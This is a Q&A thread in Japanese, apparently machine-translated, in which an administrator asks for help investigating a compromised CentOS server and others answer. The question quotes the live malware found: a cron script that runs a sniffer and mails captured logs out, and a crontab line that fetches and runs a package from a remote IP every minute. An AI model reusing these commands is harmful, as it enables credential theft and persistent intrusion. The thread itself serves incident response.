web-dev-qa-db-ja.com

ハッキングされているLinuxサーバーに関するアドバイスが必要

私は現在、centosサーバーの1つが侵害された方法を見つけようとしています。私たちのサイトでマルウェアが発生していました。検索した後、私は最終的にサイトに侵入するマルウェアを発見しました。ランダムに発生していたため、検出が困難でした。私はこのブログ記事の助けを借りました:

http://blog.unmaskparasites.com/2012/09/10/malicious-Apache-module-injects-iframes/

これにより、各Apacheモジュールを検索し、最終的にマルウェアを注入しているモジュールを見つけました。これはmod_string_mime.soという名前で、検出を回避するために/etc/httpd/conf.d/mailman.confからロードされていました。とてもイライラします。したがって、モジュールは削除され、mailman.confファイルは通常に戻ります。

さらに掘り下げて、rkhunterをインストールして実行しました。これを実行すると、/ etc/cron.daily /にdnsqueryと呼ばれる疑わしいファイルの警告が見つかりました。このファイルでは、これは次のようになります…

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail [email protected] -s "$(hostname -f)" < test
mail [email protected] -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

このファイルを削除しようとしましたが、毎分戻ってきます。所有者とグループは「psaadm」です。作成方法がわかりません。私はそれがplesk cronか何かを通して生成していると思います。

私はこれもcrontabで見つけました:

*   *   *   *   *   chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;

これは正しくありません。

侵入を続行または特定する方法に関する提案はありますか?

4
davidbehan

まず最初に。マシンが危険にさらされており、危険にさらすためにいくつかのものがインストールされています。これは回収できません。機械は火で洗浄する必要があります。完全なフォーマットを回避して再インストールすることはできません。あなたのシステムは死んでいます。それに涙を流して、次に進みます。

今、私たちは死後分析についてのみ話している。 crontabは1分ごとにパッケージ(「skdet.tgz」ファイル)を目に見える形でダウンロードし、その後圧縮解除して起動し、いくつかの...興味深いことを行います。たとえば、それは自動的に略奪し、/etc/shadowファイル。別のマシンにファイルをダウンロードして解凍し、内容を検査することをお勧めします(notファイルを起動します!);それは有益です。

パッケージには「メッセージ」が含まれており、ルートキットの作者は何も壊していないこと、および連絡があった場合はルートキットを削除するのに役立つ可能性があると述べていますが、条件については触れていません。これは、手に負えなくなった真の科学的体験かもしれません。これはまた、より平凡なランサムのケースかもしれません。

6
Tom Leek

できることは1つだけです。

enter image description here

serverfault でこれに関するスタブを参照するのが最善です。

さまざまなWebサイトをホストするためにWebサーバーを使用している場合、最善の方法は、すべてのサイトに、投獄されている独自のユーザーがいることを確認することです。これにより、システムが危険にさらされるリスクが軽減されます。 (特権の昇格につながる可能性のある脆弱なバイナリがまだ存在する可能性があるため、セキュリティパッチがリリースされたときに、できるだけ早くマシンにパッチを適用する必要があります)。たとえば suphp は、この目的のために特別に作成され、Webサーバーが実行しているユーザーではなく、その所有者の下でコードを実行します。

さらに、Webアプリケーションファイアウォールとホスト侵入検知システムを使用してマシンを強化することをお勧めします。これにより、発生する可能性のある攻撃の量が減少します(サービスに干渉する可能性があるため、多少の調整が必要です)。

4
Lucas Kauffman